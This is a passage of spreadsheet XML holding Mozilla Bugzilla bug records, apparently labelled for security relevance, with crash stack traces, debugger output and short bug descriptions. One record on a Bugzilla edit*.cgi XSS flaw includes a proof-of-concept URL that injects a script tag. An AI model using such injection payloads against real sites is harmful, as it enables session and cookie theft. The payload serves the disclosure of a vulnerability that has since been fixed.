==53139==    by 0x8186008: js::StackSpace::markFrameSlots(JSTracer*, js::StackFrame*, JS::Value*, unsigned char*) (jsgcmark.h:114)
==53139==    by 0x8186162: js::StackSpace::mark(JSTracer*) (Stack.cpp:521)
==53139==    by 0x80A20A4: _ZN2jsL11MarkRuntimeEP8JSTracerb.clone.224 (jsgc.cpp:2397)
==53139==    by 0x80A26DE: BeginMarkPhase(JSRuntime*) (jsgc.cpp:2990)
==53139==    by 0x80A3D18: GCCycle(JSContext*, JSCompartment*, long long, js::JSGCInvocationKind) (jsgc.cpp:3289)
==53139==    by 0x80A4F8A: Collect(JSContext*, JSCompartment*, long long, js::JSGCInvocationKind, js::gcreason::Reason) (jsgc.cpp:3707)
==53139==    by 0x807F58B: js_HandleExecutionInterrupt(JSContext*) (jscntxt.cpp:856)
==53139==    by 0x8301FF3: ??? (in /srv/repos/mozilla-central/js/src/opt32/shell/js)
==53139==  Address 0x0 is not stack'd, malloc'd or (recently) free'd</t>
        </is>
      </c>
      <c r="X1662" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1663">
      <c r="A1663" t="n">
        <v>440192</v>
      </c>
      <c r="B1663" t="inlineStr">
        <is>
          <t>2008-06-18 16:12:02 -0700</t>
        </is>
      </c>
      <c r="C1663" t="inlineStr">
        <is>
          <t>Staging-Master should be upgraded to Twisted 8.x and Python 2.5.2</t>
        </is>
      </c>
      <c r="D1663" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E1663" t="n">
        <v>1</v>
      </c>
      <c r="F1663" t="n">
        <v>1</v>
      </c>
      <c r="G1663" t="n">
        <v>5</v>
      </c>
      <c r="H1663" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1663" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J1663" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1663" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L1663" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1663" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1663" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1663" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1663" t="inlineStr"/>
      <c r="Q1663" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1663" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1663" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1663" t="n">
        <v>1</v>
      </c>
      <c r="U1663" t="n">
        <v>0</v>
      </c>
      <c r="V1663" t="n">
        <v>3</v>
      </c>
      <c r="W1663" t="inlineStr">
        <is>
          <t>Just looking into bringing the unittest-staging master over to staging-master and noticed that the versions are slightly out of date.
Can these be brought up to date?</t>
        </is>
      </c>
      <c r="X1663" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1664">
      <c r="A1664" t="n">
        <v>1411827</v>
      </c>
      <c r="B1664" t="inlineStr">
        <is>
          <t>2017-10-25 19:57:37 -0700</t>
        </is>
      </c>
      <c r="C1664" t="inlineStr">
        <is>
          <t>Crash in java.lang.NullPointerException: Attempt to invoke interface method ''android.view.MenuItem android.view.MenuItem.setChecked(boolean)'' on a null object reference at org.mozilla.gecko.BrowserApp.onPrepareOptionsMenu(BrowserApp.java) (Android O)</t>
        </is>
      </c>
      <c r="D1664" t="inlineStr">
        <is>
          <t>2020-12-21 10:38:46 -0800</t>
        </is>
      </c>
      <c r="E1664" t="n">
        <v>1</v>
      </c>
      <c r="F1664" t="n">
        <v>1</v>
      </c>
      <c r="G1664" t="n">
        <v>6</v>
      </c>
      <c r="H1664" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I1664" t="inlineStr">
        <is>
          <t>Firefox for Android Graveyard</t>
        </is>
      </c>
      <c r="J1664" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1664" t="inlineStr">
        <is>
          <t>56 Branch</t>
        </is>
      </c>
      <c r="L1664" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1664" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N1664" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1664" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1664" t="inlineStr">
        <is>
          <t>[FNC][SPT59.1][INT]</t>
        </is>
      </c>
      <c r="Q1664" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1664" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1664" t="inlineStr">
        <is>
          <t>Firefox 57</t>
        </is>
      </c>
      <c r="T1664" t="n">
        <v>1</v>
      </c>
      <c r="U1664" t="n">
        <v>0</v>
      </c>
      <c r="V1664" t="n">
        <v>6</v>
      </c>
      <c r="W1664" t="inlineStr">
        <is>
          <t>Feedback from users:
----------------------------------
HUAWEI Mate 10
Android 8.0
Firefox for Android 56.0
Tapping on the Menu icon on the right top corner
=&gt; Crash
https://crash-stats.mozilla.com/report/index/69399670-5d8a-4d49-9fcf-8b04c0171023
As far as we know, HUAWEI launched their latest product, Mate 10, with Android 8.0， OPPO and VIVO，two major mobile manufacturers in China， are going to launch their new product with Android 8.0 soon， so the priority is set to P1.
Additional info from HUAWEI:
-------------------------------------------
10-23 15:43:06.499 17181 17181 E AndroidRuntime: FATAL EXCEPTION: main
10-23 15:43:06.499 17181 17181 E AndroidRuntime: Process: org.mozilla.firefox, PID: 17181
10-23 15:43:06.499 17181 17181 E AndroidRuntime: java.lang.NullPointerException: Attempt to invoke interface method 'android.view.MenuItem android.view.MenuItem.setChecked(boolean)' on a null object reference
10-23 15:43:06.499 17181 17181 E AndroidRuntime:          at org.mozilla.gecko.BrowserApp.onPrepareOptionsMenu(BrowserApp.java:3527)
10-23 15:43:06.499 17181 17181 E AndroidRuntime:          at org.mozilla.gecko.GeckoApp.invalidateOptionsMenu(GeckoApp.java:439)
10-23 15:43:06.499 17181 17181 E AndroidRuntime:          at org.mozilla.gecko.GeckoApp.getMenuPanel(GeckoApp.java:461)
10-23 15:43:06.499 17181 17181 E AndroidRuntime:          at org.mozilla.gecko.toolbar.BrowserToolbar.openOptionsMenu(BrowserToolbar.java:882)
10-23 15:43:06.499 17181 17181 E AndroidRuntime:          at org.mozilla.gecko.BrowserApp.openOptionsMenu(BrowserApp.java:3490)
10-23 15:43:06.499 17181 17181 E AndroidRuntime:          at org.mozilla.gecko.toolbar.BrowserToolbar$7.onClick(BrowserToolbar.java:337)
10-23 15:43:06.499 17181 17181 E AndroidRuntime:          at android.view.View.performClick(View.java:6291)
10-23 15:43:06.499 17181 17181 E AndroidRuntime:          at android.view.View$PerformClick.run(View.java:24931)
10-23 15:43:06.499 17181 17181 E AndroidRuntime:          at android.os.Handler.handleCallback(Handler.java:808)
10-23 15:43:06.499 17181 17181 E AndroidRuntime:          at android.os.Handler.dispatchMessage(Handler.java:101)
10-23 15:43:06.499 17181 17181 E AndroidRuntime:          at android.os.Looper.loop(Looper.java:166)
10-23 15:43:06.499 17181 17181 E AndroidRuntime:          at android.app.ActivityThread.main(ActivityThread.java:7358)
10-23 15:43:06.499 17181 17181 E AndroidRuntime:          at java.lang.reflect.Method.invoke(Native Method)
10-23 15:43:06.499 17181 17181 E AndroidRuntime:          at com.android.internal.os.Zygote$MethodAndArgsCaller.run(Zygote.java:245)
10-23 15:43:06.499 17181 17181 E AndroidRuntime:          at com.android.internal.os.ZygoteInit.main(ZygoteInit.java:926)
10-23 15:43:06.499 12493 12509 W zygote  : Couldn't lock the profile file /data/user/0/com.tencent.qqmusic/app_tbs/core_unzip_tmp/game_impl_dex.jar.prof: Failed to open file '/data/user/0/com.tencent.qqmusic/app_tbs/core_unzip_tmp/game_impl_dex.jar.prof': No such file or directory
10-23 15:43:06.499 12493 12509 W zygote  : Could not forcefully load profile /data/user/0/com.tencent.qqmusic/app_tbs/core_unzip_tmp/game_impl_dex.jar.prof
10-23 15:43:06.499 17181 17181 E GeckoCrashHandler: &gt;&gt;&gt; REPORTING UNCAUGHT EXCEPTION FROM THREAD 1 ("main")
10-23 15:43:06.499 17181 17181 E GeckoCrashHandler: java.lang.NullPointerException: Attempt to invoke interface method 'android.view.MenuItem android.view.MenuItem.setChecked(boolean)' on a null object reference
10-23 15:43:06.499 17181 17181 E GeckoCrashHandler:    at org.mozilla.gecko.BrowserApp.onPrepareOptionsMenu(BrowserApp.java:3527)
10-23 15:43:06.499 17181 17181 E GeckoCrashHandler:    at org.mozilla.gecko.GeckoApp.invalidateOptionsMenu(GeckoApp.java:439)
10-23 15:43:06.499 17181 17181 E GeckoCrashHandler:    at org.mozilla.gecko.GeckoApp.getMenuPanel(GeckoApp.java:461)
10-23 15:43:06.499 17181 17181 E GeckoCrashHandler:    at org.mozilla.gecko.toolbar.BrowserToolbar.openOptionsMenu(BrowserToolbar.java:882)
10-23 15:43:06.499 17181 17181 E GeckoCrashHandler:    at org.mozilla.gecko.BrowserApp.openOptionsMenu(BrowserApp.java:3490)
10-23 15:43:06.499 17181 17181 E GeckoCrashHandler:    at org.mozilla.gecko.toolbar.BrowserToolbar$7.onClick(BrowserToolbar.java:337)
10-23 15:43:06.499 17181 17181 E GeckoCrashHandler:    at android.view.View.performClick(View.java:6291)
10-23 15:43:06.499 17181 17181 E GeckoCrashHandler:    at android.view.View$PerformClick.run(View.java:24931)
10-23 15:43:06.499 17181 17181 E GeckoCrashHandler:    at android.os.Handler.handleCallback(Handler.java:808)
10-23 15:43:06.499 17181 17181 E GeckoCrashHandler:    at android.os.Handler.dispatchMessage(Handler.java:101)
10-23 15:43:06.499 17181 17181 E GeckoCrashHandler:    at android.os.Looper.loop(Looper.java:166)
10-23 15:43:06.499 17181 17181 E GeckoCrashHandler:    at android.app.ActivityThread.main(ActivityThread.java:7358)
10-23 15:43:06.499 17181 17181 E GeckoCrashHandler:    at java.lang.reflect.Method.invoke(Native Method)
10-23 15:43:06.499 17181 17181 E GeckoCrashHandler:    at com.android.internal.os.Zygote$MethodAndArgsCaller.run(Zygote.java:245)
10-23 15:43:06.499 17181 17181 E GeckoCrashHandler:    at com.android.internal.os.ZygoteInit.main(ZygoteInit.java:926)</t>
        </is>
      </c>
      <c r="X1664" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1665">
      <c r="A1665" t="n">
        <v>431705</v>
      </c>
      <c r="B1665" t="inlineStr">
        <is>
          <t>2008-05-01 10:17:22 -0700</t>
        </is>
      </c>
      <c r="C1665" t="inlineStr">
        <is>
          <t>Crash [@ nsStyleContext::Destroy] on reload with mtext and -moz-box-ordinal-group</t>
        </is>
      </c>
      <c r="D1665" t="inlineStr">
        <is>
          <t>2011-06-13 10:01:47 -0700</t>
        </is>
      </c>
      <c r="E1665" t="n">
        <v>1</v>
      </c>
      <c r="F1665" t="n">
        <v>1</v>
      </c>
      <c r="G1665" t="n">
        <v>3</v>
      </c>
      <c r="H1665" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1665" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1665" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K1665" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1665" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1665" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1665" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1665" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1665" t="inlineStr">
        <is>
          <t>[sg:critical] post 1.8-branch</t>
        </is>
      </c>
      <c r="Q1665" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R1665" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1665" t="inlineStr">
        <is>
          <t>mozilla1.9.2a1</t>
        </is>
      </c>
      <c r="T1665" t="n">
        <v>1</v>
      </c>
      <c r="U1665" t="n">
        <v>0</v>
      </c>
      <c r="V1665" t="n">
        <v>31</v>
      </c>
      <c r="W1665" t="inlineStr">
        <is>
          <t>Created attachment 318842
testcase
See testcase which crashes in current trunk build on reload.
It doesn't crash in a 2008-01-09 build, but does crash in a 2008-01-10 build:
http://bonsai.mozilla.org/cvsquery.cgi?treeid=default&amp;module=all&amp;branch=HEAD&amp;branchtype=match&amp;dir=&amp;file=&amp;filetype=match&amp;who=&amp;whotype=match&amp;sortby=Date&amp;hours=2&amp;date=explicit&amp;mindate=2008-01-09+15&amp;maxdate=2008-01-10+07&amp;cvsroot=%2Fcvsroot
http://crash-stats.mozilla.com/report/index/17f5d623-179f-11dd-9990-001cc45a2ce4?p=1
0  	 	@0x308e349
Stack from debug build:
 	dddddddd()	
&gt;	gklayout.dll!nsCOMPtr&lt;nsPresContext&gt;::nsCOMPtr&lt;nsPresContext&gt;(nsPresContext * aRawPtr=0x0551d060)  Line 628	C++
 	gklayout.dll!nsStyleContext::Destroy()  Line 926	C++
 	gklayout.dll!nsStyleContext::Release()  Line 93	C++
 	gklayout.dll!nsStyleContext::~nsStyleContext()  Line 108	C++
 	gklayout.dll!nsStyleContext::`scalar deleting destructor'()  + 0xf bytes	C++
 	gklayout.dll!nsStyleContext::Destroy()  Line 930	C++
 	gklayout.dll!nsStyleContext::Release()  Line 93	C++
 	gklayout.dll!nsFrame::~nsFrame()  Line 351	C++
 	gklayout.dll!nsSplittableFrame::~nsSplittableFrame()  + 0xf bytes	C++
 	gklayout.dll!nsContainerFrame::~nsContainerFrame()  Line 82 + 0x13 bytes	C++
 	gklayout.dll!nsHTMLContainerFrame::~nsHTMLContainerFrame()  + 0xf bytes	C++
 	gklayout.dll!nsBlockFrame::~nsBlockFrame()  Line 282 + 0x1e bytes	C++
 	gklayout.dll!nsBlockFrame::`scalar deleting destructor'()  + 0xf bytes	C++
 	gklayout.dll!nsFrame::Destroy()  Line 510 + 0x24 bytes	C++
 	gklayout.dll!nsSplittableFrame::Destroy()  Line 74	C++
 	gklayout.dll!nsContainerFrame::Destroy()  Line 300	C++
 	gklayout.dll!nsBlockFrame::Destroy()  Line 314	C++
 	gklayout.dll!nsFrameList::DestroyFrames()  Line 68	C++
 	gklayout.dll!nsContainerFrame::Destroy()  Line 260	C++
 	gklayout.dll!nsBoxFrame::Destroy()  Line 963	C++
 	gklayout.dll!nsDocElementBoxFrame::Destroy()  Line 110	C++
 	gklayout.dll!nsFrameList::DestroyFrames()  Line 68	C++
 	gklayout.dll!nsContainerFrame::Destroy()  Line 260	C++
 	gklayout.dll!nsBoxFrame::Destroy()  Line 963	C++
 	gklayout.dll!nsFrameList::DestroyFrames()  Line 68	C++
 	gklayout.dll!nsContainerFrame::Destroy()  Line 260	C++
 	gklayout.dll!ViewportFrame::Destroy()  Line 69	C++
 	gklayout.dll!nsFrameManager::Destroy()  Line 284	C++
 	gklayout.dll!PresShell::Destroy()  Line 1708	C++
 	gklayout.dll!DocumentViewerImpl::Destroy()  Line 1526	C++
 	gklayout.dll!DocumentViewerImpl::Show()  Line 1848	C++
 	gklayout.dll!nsPresContext::EnsureVisible(int aUnsuppressFocus=0)  Line 1461	C++
 	gklayout.dll!PresShell::UnsuppressAndInvalidate()  Line 4316 + 0xd bytes	C++
 	gklayout.dll!PresShell::UnsuppressPainting()  Line 4365	C++
 	gklayout.dll!DocumentViewerImpl::LoadComplete(unsigned int aStatus=0)  Line 1015	C++
 	docshell.dll!nsDocShell::EndPageLoad(nsIWebProgress * aProgress=0x053b165c, nsIChannel * aChannel=0x0510d830, unsigned int aStatus=0)  Line 5069	C++
 	docshell.dll!nsWebShell::EndPageLoad(nsIWebProgress * aProgress=0x053b165c, nsIChannel * channel=0x0510d830, unsigned int aStatus=0)  Line 1016	C++
 	docshell.dll!nsDocShell::OnStateChange(nsIWebProgress * aProgress=0x053b165c, nsIRequest * aRequest=0x0510d830, unsigned int aStateFlags=131088, unsigned int aStatus=0)  Line 4974	C++
 	docshell.dll!nsDocLoader::FireOnStateChange(nsIWebProgress * aProgress=0x053b165c, nsIRequest * aRequest=0x0510d830, int aStateFlags=131088, unsigned int aStatus=0)  Line 1236	C++
 	docshell.dll!nsDocLoader::doStopDocumentLoad(nsIRequest * request=0x0510d830, unsigned int aStatus=0)  Line 869	C++
 	docshell.dll!nsDocLoader::DocLoaderIsEmpty()  Line 765	C++
 	docshell.dll!nsDocLoader::OnStopRequest(nsIRequest * aRequest=0x05553698, nsISupports * aCtxt=0x00000000, unsigned int aStatus=0)  Line 682	C++
 	necko.dll!nsLoadGroup::RemoveRequest(nsIRequest * request=0x05553698, nsISupports * ctxt=0x00000000, unsigned int aStatus=0)  Line 688 + 0x2e bytes	C++
 	gklayout.dll!nsDocument::DoUnblockOnload()  Line 5731	C++
 	gklayout.dll!nsDocument::UnblockOnload(int aFireSync=1)  Line 5679	C++
 	gklayout.dll!nsBindingManager::DoProcessAttachedQueue()  Line 963	C++
 	gklayout.dll!nsRunnableMethod&lt;nsBindingManager&gt;::Run()  Line 262	C++
 	xpcom_core.dll!nsThread::ProcessNextEvent(int mayWait=1, int * result=0x0012f848)  Line 511	C++
 	xpcom_core.dll!NS_ProcessNextEvent_P(nsIThread * thread=0x012b4098, int mayWait=1)  Line 227 + 0x16 bytes	C++
 	gkwidget.dll!nsBaseAppShell::Run()  Line 170 + 0xc bytes	C++
 	tkitcmps.dll!nsAppStartup::Run()  Line 181 + 0x1c bytes	C++
 	xul.dll!XRE_main(int argc=1, char * * argv=0x003ff7f0, const nsXREAppData * aAppData=0x003ffe98)  Line 3170 + 0x25 bytes	C++
 	firefox.exe!NS_internal_main(int argc=1, char * * argv=0x003ff7f0)  Line 158 + 0x12 bytes	C++
 	firefox.exe!wmain(int argc=1, unsigned short * * argv=0x003fa080)  Line 87 + 0xd bytes	C++
 	firefox.exe!__tmainCRTStartup()  Line 583 + 0x19 bytes	C
 	firefox.exe!wmainCRTStartup()  Line 403	C
 	kernel32.dll!_BaseProcessStart@4()  + 0x23 bytes</t>
        </is>
      </c>
      <c r="X1665" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1666">
      <c r="A1666" t="n">
        <v>235265</v>
      </c>
      <c r="B1666" t="inlineStr">
        <is>
          <t>2004-02-22 22:59:03 -0800</t>
        </is>
      </c>
      <c r="C1666" t="inlineStr">
        <is>
          <t>Url-parameter XSS vulnerability in edit*.cgi</t>
        </is>
      </c>
      <c r="D1666" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:38 -0800</t>
        </is>
      </c>
      <c r="E1666" t="n">
        <v>1</v>
      </c>
      <c r="F1666" t="n">
        <v>1</v>
      </c>
      <c r="G1666" t="n">
        <v>4</v>
      </c>
      <c r="H1666" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I1666" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J1666" t="inlineStr">
        <is>
          <t>Administration</t>
        </is>
      </c>
      <c r="K1666" t="inlineStr">
        <is>
          <t>2.17.6</t>
        </is>
      </c>
      <c r="L1666" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1666" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1666" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1666" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1666" t="inlineStr">
        <is>
          <t>[fixed in 2.16.6] [fixed in 2.18rc1]</t>
        </is>
      </c>
      <c r="Q1666" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1666" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1666" t="inlineStr">
        <is>
          <t>Bugzilla 2.16</t>
        </is>
      </c>
      <c r="T1666" t="n">
        <v>1</v>
      </c>
      <c r="U1666" t="n">
        <v>0</v>
      </c>
      <c r="V1666" t="n">
        <v>15</v>
      </c>
      <c r="W1666" t="inlineStr">
        <is>
          <t>This is a minor one, but still:
If you manage to get an Bugzilla administrator to click an url like
http://bugzilla.mozilla.org/editmilestones.cgi?product=foo&amp;milestone=bar&amp;action=baz&amp;hack=%3Cscript%3Ealert('hax0red')%3C/script%3E
The JavaScript is run in Bugzilla's security context, potentially leaking
cookies and so on.</t>
        </is>
      </c>
      <c r="X1666" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1667">
      <c r="A1667" t="n">
        <v>253952</v>
      </c>
      <c r="B1667" t="inlineStr">
        <is>
          <t>2004-08-01 15:21:41 -0700</t>
        </is>
      </c>
      <c r="C1667" t="inlineStr">
        <is>
          <t>Assertion failure at jsemit.c line 3034</t>
        </is>
      </c>
      <c r="D1667" t="inlineStr">
        <is>
          <t>2004-08-02 10:18:03 -0700</t>
        </is>
      </c>
      <c r="E1667" t="n">
        <v>1</v>
      </c>
      <c r="F1667" t="n">
        <v>1</v>
      </c>
      <c r="G1667" t="n">
        <v>3</v>
      </c>
      <c r="H1667" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1667" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1667" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K1667" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1667" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1667" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1667" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1667" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1667" t="inlineStr"/>
      <c r="Q1667" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1667" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1667" t="inlineStr">
        <is>
          <t>mozilla1.8alpha3</t>
        </is>
      </c>
      <c r="T1667" t="n">
        <v>1</v>
      </c>
      <c r="U1667" t="n">
        <v>0</v>
      </c>
      <c r="V1667" t="n">
        <v>4</v>
      </c>
      <c r="W1667" t="inlineStr">
        <is>
          <t>This is no mandrake linux 9.2 using gcc 3.3.1. I build my own mozilla from
source; this copy was pulled and built the morning of july 31st.
I encountered this by following the sample URL, which is apparently redirects to
&lt;http://www.smh.com.au/articles/2004/08/01/1091298577466.html&gt;. The page which
actually displays is a page served by www.smh.com.au warning the user that
smh.com.au is phasing in user registrations. I also reproduced the problem by
pasting &lt;http://www.smh.com.au/articles/2004/08/01/1091298577466.html&gt; into a
fresh browser window; in this case the article loaded but the assertion failure
still triggered.
Either way, the js engine asserts while parsing
&lt;http://smh.com.au/sitecatalyst/s_code_remote.js&gt;:
(gdb) bt
#0  0x407bb006 in nanosleep () from /lib/i686/libc.so.6
#1  0xffffffa0 in ?? ()
#2  0x407bae37 in sleep () from /lib/i686/libc.so.6
#3  0x08069546 in ah_crap_handler (signum=6)
    at /extra/kherron/moz/mozilla/xpfe/bootstrap/nsSigHandlers.cpp:135
#4  0x4206d460 in nsProfileLock::FatalSignalHandler (signo=6)
    at
/extra/kherron/moz/mozilla/profile/dirserviceprovider/src/nsProfileLock.cpp:208
#5  0x400f14ec in __pthread_clock_settime () from /lib/i686/libpthread.so.0
#6  &lt;signal handler called&gt;
#7  0x40738d71 in kill () from /lib/i686/libc.so.6
#8  0x400ee871 in pthread_kill () from /lib/i686/libpthread.so.0
#9  0x400eeb8b in raise () from /lib/i686/libpthread.so.0
#10 0x40738b04 in raise () from /lib/i686/libc.so.6
#11 0x4073a1e0 in abort () from /lib/i686/libc.so.6
#12 0x40084119 in JS_Assert (s=0x4008c4b7 "0",
    file=0x400897a0 "/extra/kherron/moz/mozilla/js/src/jsemit.c", ln=3034)
    at /extra/kherron/moz/mozilla/js/src/jsutil.c:155
#13 0x4003f22b in js_EmitTree (cx=0x9822af0, cg=0xbfffe9c4, pn=0x9798910)
    at /extra/kherron/moz/mozilla/js/src/jsemit.c:3034
#14 0x4006d48e in Statements (cx=0x9822af0, ts=0x9798598, tc=0xbfffe9c4)
    at /extra/kherron/moz/mozilla/js/src/jsparse.c:1026
#15 0x4006c76c in js_CompileTokenStream (cx=0x9822af0, chain=0x0,
    ts=0x9798598, cg=0xbfffe9c4)
    at /extra/kherron/moz/mozilla/js/src/jsparse.c:451
#16 0x400298f3 in CompileTokenStream (cx=0x9822af0, obj=0x92a7420,
    ts=0x9798598, tempMark=0x0, eofp=0x0)
    at /extra/kherron/moz/mozilla/js/src/jsapi.c:3097
#17 0x40029a9f in JS_CompileUCScriptForPrincipals (cx=0x9822af0,
    obj=0x92a7420, principals=0x8daaa2c, chars=0x9a81b20, length=17286,
    filename=0x9aefe88 "http://smh.com.au/sitecatalyst/s_code_remote.js",
    lineno=1) at /extra/kherron/moz/mozilla/js/src/jsapi.c:3178
#18 0x4002a46e in JS_EvaluateUCScriptForPrincipals (cx=0x9822af0,
    obj=0x92a7420, principals=0x8daaa2c, chars=0x9a81b20, length=17286,
    filename=0x9aefe88 "http://smh.com.au/sitecatalyst/s_code_remote.js",
    lineno=1, rval=0xbfffeb68)
    at /extra/kherron/moz/mozilla/js/src/jsapi.c:3630
#19 0x41df8fa7 in nsJSContext::EvaluateString (this=0x9822aa8,
    aScript=@0x92ae548, aScopeObject=0x92a7420, aPrincipal=0x8daaa28,
---Type &lt;return&gt; to continue, or q &lt;return&gt; to quit---q
aURL=0x9aeQuit
) at /extra/kherron/moz/mozilla/dom/src/base/nsJSEnvironment.cpp:994
#20 0x41cb12ac in nsScriptLoader::EvaluateScript (this=0xbfffec80,
    aRequest=0x92ae530, aScript=@0x92ae548)
    at /extra/kherron/moz/mozilla/content/base/src/nsScriptLoader.cpp:668
#21 0x41cb0f79 in nsScriptLoader::ProcessRequest (this=0x8f82cd0,
    aRequest=0x92ae530)
    at /extra/kherron/moz/mozilla/content/base/src/nsScriptLoader.cpp:586
#22 0x41cb1ceb in nsScriptLoader::OnStreamComplete (this=0x8f82cd0,
    aLoader=0x9794b18, aContext=0x92ae530, aStatus=150482156,
    stringLen=4294967295, string=0x98639ef "")
&lt;snip&gt;
(gdb) frame 13
#13 0x4003f22b in js_EmitTree (cx=0x9822af0, cg=0xbfffe9c4, pn=0x9798910)
    at /extra/kherron/moz/mozilla/js/src/jsemit.c:3034
3034                          default:          JS_ASSERT(0);
Current language:  auto; currently c
(gdb) p pn3
$1 = (JSParseNode *) 0x9b46e90
(gdb) p *pn3
$2 = {pn_type = TOK_NAME, pn_pos = {begin = {index = 9, lineno = 34}, end = {
      index = 10, lineno = 34}}, pn_op = 154, pn_offset = 168,
  pn_arity = PN_NAME, pn_u = {func = {funAtom = 0x8124ea0, body = 0x0,
      flags = 32, tryCount = 5}, list = {head = 0x8124ea0, tail = 0x0,
      count = 32, extra = 5}, ternary = {kid1 = 0x8124ea0, kid2 = 0x0,
      kid3 = 0x20}, binary = {left = 0x8124ea0, right = 0x0, val = 32},
    unary = {kid = 0x8124ea0, num = 0}, name = {atom = 0x8124ea0, expr = 0x0,
      slot = 32, attrs = 5}, dval = 6.6905136571969587e-316}, pn_next = 0x0}
pn_op 154 is JSOP_GETGVAR, which isn't handled by the switch statement starting
at jsemit.c line 3026.
I suspect this is related to the checkin for bug 252892.</t>
        </is>
      </c>
      <c r="X1667" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1668">
      <c r="A1668" t="n">
        <v>187230</v>
      </c>
      <c r="B1668" t="inlineStr">
        <is>
          <t>2002-12-30 23:41:02 -0800</t>
        </is>
      </c>
      <c r="C1668" t="inlineStr">
        <is>
          <t>[SECURITY] Physical path to files revealed in error messages</t>
        </is>
      </c>
      <c r="D1668" t="inlineStr">
        <is>
          <t>2016-06-21 13:34:30 -0700</t>
        </is>
      </c>
      <c r="E1668" t="n">
        <v>1</v>
      </c>
      <c r="F1668" t="n">
        <v>1</v>
      </c>
      <c r="G1668" t="n">
        <v>6</v>
      </c>
      <c r="H1668" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I1668" t="inlineStr">
        <is>
          <t>Webtools Graveyard</t>
        </is>
      </c>
      <c r="J1668" t="inlineStr">
        <is>
          <t>Bonsai</t>
        </is>
      </c>
      <c r="K1668" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1668" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1668" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1668" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1668" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1668" t="inlineStr"/>
      <c r="Q1668" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1668" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S1668" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1668" t="n">
        <v>1</v>
      </c>
      <c r="U1668" t="n">
        <v>0</v>
      </c>
      <c r="V1668" t="n">
        <v>4</v>
      </c>
      <c r="W1668" t="inlineStr">
        <is>
